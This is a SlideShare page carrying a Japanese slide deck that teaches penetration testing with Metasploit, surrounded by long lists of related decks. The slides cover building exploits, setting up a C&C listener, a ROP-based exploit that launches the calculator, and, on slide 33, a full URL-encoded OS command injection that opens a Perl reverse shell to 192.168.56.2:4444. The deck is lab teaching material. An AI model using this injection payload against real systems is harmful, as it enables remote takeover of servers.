Soumettre la recherche
Mettre en ligne
Metasploitでペネトレーションテスト
•
Télécharger en tant que PPTX, PDF
•
39 j'aime
•
23,659 vues
S
super_a1ice
Suivre
Internet
Signaler
Partager
Signaler
Partager
1 sur 49
Télécharger maintenant
Recommandé
目grep入門 +解説
目grep入門 +解説
murachue
初心者向けCTFのWeb分野の強化法
初心者向けCTFのWeb分野の強化法
kazkiti
Guide To AGPL
Guide To AGPL
Mikiya Okuno
マイクロサービス 4つの分割アプローチ
マイクロサービス 4つの分割アプローチ
増田 亨
PenTesterが知っている危ないAWS環境の共通点
PenTesterが知っている危ないAWS環境の共通点
zaki4649
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
Masahito Zembutsu
例外設計における大罪
例外設計における大罪
Takuto Wada
とある診断員とSQLインジェクション
とある診断員とSQLインジェクション
zaki4649
Recommandé
目grep入門 +解説
目grep入門 +解説
murachue
初心者向けCTFのWeb分野の強化法
初心者向けCTFのWeb分野の強化法
kazkiti
Guide To AGPL
Guide To AGPL
Mikiya Okuno
マイクロサービス 4つの分割アプローチ
マイクロサービス 4つの分割アプローチ
増田 亨
PenTesterが知っている危ないAWS環境の共通点
PenTesterが知っている危ないAWS環境の共通点
zaki4649
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
Masahito Zembutsu
例外設計における大罪
例外設計における大罪
Takuto Wada
とある診断員とSQLインジェクション
とある診断員とSQLインジェクション
zaki4649
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Linux女子部 systemd徹底入門
Linux女子部 systemd徹底入門
Etsuji Nakai
どうやって決める?kubernetesでのシークレット管理方法(Cloud Native Days 2020 発表資料)
どうやって決める?kubernetesでのシークレット管理方法(Cloud Native Days 2020 発表資料)
NTT DATA Technology & Innovation
Db2 v11.5.4 高可用性構成 & HADR 構成パターンご紹介
Db2 v11.5.4 高可用性構成 & HADR 構成パターンご紹介
IBM Analytics Japan
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
その ionice、ほんとに効いてますか?
その ionice、ほんとに効いてますか?
Narimichi Takamura
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
mosa siru
えっ今日はハッキングしてもいいのか?(CTF Web入門)
えっ今日はハッキングしてもいいのか?(CTF Web入門)
otya mura
オススメのJavaログ管理手法 ~コンテナ編~(Open Source Conference 2022 Online/Spring 発表資料)
オススメのJavaログ管理手法 ~コンテナ編~(Open Source Conference 2022 Online/Spring 発表資料)
NTT DATA Technology & Innovation
エンジニアのためのOSSライセンス管理~OSS管理ツールの池の水全部抜く~
エンジニアのためのOSSライセンス管理~OSS管理ツールの池の水全部抜く~
Daisuke Morishita
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
Mavenの真実とウソ
Mavenの真実とウソ
Yoshitaka Kawashima
初心者向けMongoDBのキホン!
初心者向けMongoDBのキホン!
Tetsutaro Watanabe
Redisの特徴と活用方法について
Redisの特徴と活用方法について
Yuji Otani
ネットワーク ゲームにおけるTCPとUDPの使い分け
ネットワーク ゲームにおけるTCPとUDPの使い分け
モノビット エンジン
君はyarn.lockをコミットしているか?
君はyarn.lockをコミットしているか?
Teppei Sato
Unified JVM Logging
Unified JVM Logging
Yuji Kubota
Dockerfile を書くためのベストプラクティス解説編
Dockerfile を書くためのベストプラクティス解説編
Masahito Zembutsu
3種類のTEE比較(Intel SGX, ARM TrustZone, RISC-V Keystone)
3種類のTEE比較(Intel SGX, ARM TrustZone, RISC-V Keystone)
Kuniyasu Suzaki
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
Akitsugu Ito
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
takesako
Contenu connexe
Tendances
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Linux女子部 systemd徹底入門
Linux女子部 systemd徹底入門
Etsuji Nakai
どうやって決める?kubernetesでのシークレット管理方法(Cloud Native Days 2020 発表資料)
どうやって決める?kubernetesでのシークレット管理方法(Cloud Native Days 2020 発表資料)
NTT DATA Technology & Innovation
Db2 v11.5.4 高可用性構成 & HADR 構成パターンご紹介
Db2 v11.5.4 高可用性構成 & HADR 構成パターンご紹介
IBM Analytics Japan
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
その ionice、ほんとに効いてますか?
その ionice、ほんとに効いてますか?
Narimichi Takamura
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
mosa siru
えっ今日はハッキングしてもいいのか?(CTF Web入門)
えっ今日はハッキングしてもいいのか?(CTF Web入門)
otya mura
オススメのJavaログ管理手法 ~コンテナ編~(Open Source Conference 2022 Online/Spring 発表資料)
オススメのJavaログ管理手法 ~コンテナ編~(Open Source Conference 2022 Online/Spring 発表資料)
NTT DATA Technology & Innovation
エンジニアのためのOSSライセンス管理~OSS管理ツールの池の水全部抜く~
エンジニアのためのOSSライセンス管理~OSS管理ツールの池の水全部抜く~
Daisuke Morishita
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
Mavenの真実とウソ
Mavenの真実とウソ
Yoshitaka Kawashima
初心者向けMongoDBのキホン!
初心者向けMongoDBのキホン!
Tetsutaro Watanabe
Redisの特徴と活用方法について
Redisの特徴と活用方法について
Yuji Otani
ネットワーク ゲームにおけるTCPとUDPの使い分け
ネットワーク ゲームにおけるTCPとUDPの使い分け
モノビット エンジン
君はyarn.lockをコミットしているか?
君はyarn.lockをコミットしているか?
Teppei Sato
Unified JVM Logging
Unified JVM Logging
Yuji Kubota
Dockerfile を書くためのベストプラクティス解説編
Dockerfile を書くためのベストプラクティス解説編
Masahito Zembutsu
3種類のTEE比較(Intel SGX, ARM TrustZone, RISC-V Keystone)
3種類のTEE比較(Intel SGX, ARM TrustZone, RISC-V Keystone)
Kuniyasu Suzaki
Tendances
(20)
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
Linux女子部 systemd徹底入門
Linux女子部 systemd徹底入門
どうやって決める?kubernetesでのシークレット管理方法(Cloud Native Days 2020 発表資料)
どうやって決める?kubernetesでのシークレット管理方法(Cloud Native Days 2020 発表資料)
Db2 v11.5.4 高可用性構成 & HADR 構成パターンご紹介
Db2 v11.5.4 高可用性構成 & HADR 構成パターンご紹介
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
その ionice、ほんとに効いてますか?
その ionice、ほんとに効いてますか?
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
えっ今日はハッキングしてもいいのか?(CTF Web入門)
えっ今日はハッキングしてもいいのか?(CTF Web入門)
オススメのJavaログ管理手法 ~コンテナ編~(Open Source Conference 2022 Online/Spring 発表資料)
オススメのJavaログ管理手法 ~コンテナ編~(Open Source Conference 2022 Online/Spring 発表資料)
エンジニアのためのOSSライセンス管理~OSS管理ツールの池の水全部抜く~
エンジニアのためのOSSライセンス管理~OSS管理ツールの池の水全部抜く~
Docker Compose 徹底解説
Docker Compose 徹底解説
Mavenの真実とウソ
Mavenの真実とウソ
初心者向けMongoDBのキホン!
初心者向けMongoDBのキホン!
Redisの特徴と活用方法について
Redisの特徴と活用方法について
ネットワーク ゲームにおけるTCPとUDPの使い分け
ネットワーク ゲームにおけるTCPとUDPの使い分け
君はyarn.lockをコミットしているか?
君はyarn.lockをコミットしているか?
Unified JVM Logging
Unified JVM Logging
Dockerfile を書くためのベストプラクティス解説編
Dockerfile を書くためのベストプラクティス解説編
3種類のTEE比較(Intel SGX, ARM TrustZone, RISC-V Keystone)
3種類のTEE比較(Intel SGX, ARM TrustZone, RISC-V Keystone)
En vedette
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
Akitsugu Ito
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
takesako
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
UEHARA, Tetsutaro
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
Hiroshi Tokumaru
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
Sen Ueno
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
Masakazu Ikeda
ARPスプーフィングによる中間者攻撃
ARPスプーフィングによる中間者攻撃
sonickun
ダークネットのはなし #ssmjp
ダークネットのはなし #ssmjp
sonickun
Kali LinuxとMetasploitable2で遊ぼう
Kali LinuxとMetasploitable2で遊ぼう
monochrojazz
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
Burp Suite Japan User Group
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
Ken SASAKI
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
Ierae Security
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
LINE Corporation
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
sonickun
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
zaki4649
[AVTOKYO 2017] What is red team?
[AVTOKYO 2017] What is red team?
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
CpawCTF 勉強会 Network
CpawCTF 勉強会 Network
Takaaki Hoyo
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
shigeki_ohtsu
コンピュータエンジニアへのFPGAのすすめ
コンピュータエンジニアへのFPGAのすすめ
Takeshi HASEGAWA
En vedette
(19)
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
ARPスプーフィングによる中間者攻撃
ARPスプーフィングによる中間者攻撃
ダークネットのはなし #ssmjp
ダークネットのはなし #ssmjp
Kali LinuxとMetasploitable2で遊ぼう
Kali LinuxとMetasploitable2で遊ぼう
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
[AVTOKYO 2017] What is red team?
[AVTOKYO 2017] What is red team?
CpawCTF 勉強会 Network
CpawCTF 勉強会 Network
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
コンピュータエンジニアへのFPGAのすすめ
コンピュータエンジニアへのFPGAのすすめ
Similaire à Metasploitでペネトレーションテスト
システムテスト自動化標準ガイド 5章発表資料
システムテスト自動化標準ガイド 5章発表資料
Masatoshi Itoh
Spock's world
Spock's world
Takuma Watabiki
1MB
1MB
arase_utagoe
BBBBB
BBBBB
arase_utagoe
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
kinunori
Eclipse を使った java 開発 111126 杉浦
Eclipse を使った java 開発 111126 杉浦
urasandesu
vFabricを触ろう
vFabricを触ろう
土岐 孝平
第4回勉強会 単体テストのすすめ
第4回勉強会 単体テストのすすめ
hakoika-itwg
はこだてIKA 第4回勉強会 単体テスト
はこだてIKA 第4回勉強会 単体テスト
Seiji KOMATSU
Version管理 1
Version管理 1
hakoika-itwg
実際に流れているデータを見てみよう
実際に流れているデータを見てみよう
彰 村地
20130329 rtm2
20130329 rtm2
openrtm
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介
OSSラボ株式会社
CruiseControl.NET設置
CruiseControl.NET設置
Kuniaki Igarashi
クラウド開発に役立つ OSS あれこれ
クラウド開発に役立つ OSS あれこれ
Masataka MIZUNO
Kobe sec#7 summary
Kobe sec#7 summary
Yukio NAGAO
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JPCERT Coordination Center
Aeolus Conductorによる複数環境へのデプロイ自動化
Aeolus Conductorによる複数環境へのデプロイ自動化
Etsuji Nakai
20121217 jawsug-yokohama
20121217 jawsug-yokohama
Tetsuya Chiba
Capistranoで自動デプロイ
Capistranoで自動デプロイ
toyoshi
Similaire à Metasploitでペネトレーションテスト
(20)
システムテスト自動化標準ガイド 5章発表資料
システムテスト自動化標準ガイド 5章発表資料
Spock's world
Spock's world
1MB
1MB
BBBBB
BBBBB
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
Eclipse を使った java 開発 111126 杉浦
Eclipse を使った java 開発 111126 杉浦
vFabricを触ろう
vFabricを触ろう
第4回勉強会 単体テストのすすめ
第4回勉強会 単体テストのすすめ
はこだてIKA 第4回勉強会 単体テスト
はこだてIKA 第4回勉強会 単体テスト
Version管理 1
Version管理 1
実際に流れているデータを見てみよう
実際に流れているデータを見てみよう
20130329 rtm2
20130329 rtm2
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介
CruiseControl.NET設置
CruiseControl.NET設置
クラウド開発に役立つ OSS あれこれ
クラウド開発に役立つ OSS あれこれ
Kobe sec#7 summary
Kobe sec#7 summary
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
Aeolus Conductorによる複数環境へのデプロイ自動化
Aeolus Conductorによる複数環境へのデプロイ自動化
20121217 jawsug-yokohama
20121217 jawsug-yokohama
Capistranoで自動デプロイ
Capistranoで自動デプロイ
Metasploitでペネトレーションテスト
1.
Metasploitでペネトレーションテスト @super_a1ice
2.
目次 Metasploit Framework基本 Webアプリケーションの脆弱性を突いてみる Metasploit プラグイン Exploitを作って電卓を起動してみる
3.
Metasploit Frameworkとは? 脆弱性を発見し、それを実証するためのフレームワー ク ペネトレーションテストを効率化するためのツール システムに重大な被害を与える可能性があるため、使 用には注意が必要
4.
Metasploit Framework基本
5.
Msfconsoleコマンド
6.
モジュールの指定
7.
シェルコードを設定
8.
オプションの確認
9.
ファイル名を設定
10.
IPアドレスを設定
11.
ポート番号を設定
12.
Exploitの作成
13.
C&Cサーバの用意
14.
オプションの確認
15.
シェルコードの設定
16.
オプションの確認
17.
IPアドレスを設定
18.
ポート番号を設定
19.
C&Cサーバの作成
20.
Let's exploit !
21.
Readme.txt
22.
攻撃が成功すると
23.
システム情報の取得
24.
lsコマンド
25.
Webアプリケーションの脆弱性を 突いてみる
26.
準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意
27.
準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意 後ろに任意のコマンドを挿入可能
28.
※実験の際の注意 必ず仮想環境を用いること 閉じたネットワーク内で実行する スナップショットを用いて被害前の状態へ戻せるように する
29.
ペイロードを選択
30.
IPアドレスの設定
31.
バックドアの生成
32.
C&Cサーバの用意
33.
Let's exploit !! http://192.168.56.3/?ip=1.1.1.1;perl%20-MIO%20- e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socke t::INET%28PeerAddr,%22192.168.56.2:4444%22%29;STDI N-%3Efdopen%28$c,r%29;$~- %3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
34.
攻撃が成功すると
35.
Metasploit プラグイン
36.
プラグインを使用して機能を追加する
37.
便利なプラグイン Openvas MetasploitからOpenVASを利用するためのプラグイン Nessus MetasploitからNessusを利用するためのプラグイン Xssf MetasploitでXSSを行うためのプラグイン http://xssf.googlecode.com/svn/trunk auto_exploit データベースに登録された脆弱性に対してexploitする https://github.com/darkoperator/Metasploit-Plugins Postauto 確立しているセッションにコマンドを送信する https://github.com/darkoperator/Metasploit-Plugins
38.
Exploitを作って電卓を 起動してみる
39.
まずはExploitの用意 Exploit-dbから探す http://www.exploit-db.com/ 自作する
40.
今回は自作プログラムを用意
41.
大きなテキストファイルを読み込まると
42.
ROP自動化
43.
シェルコード選択
44.
変数の確認
45.
実行したいコマンドの設定
46.
pythonのコードを生成
47.
シェルコードをコピペしてから Let's exploit !!!
48.
電卓が起動!!
49.
ありがとうございました
Télécharger maintenant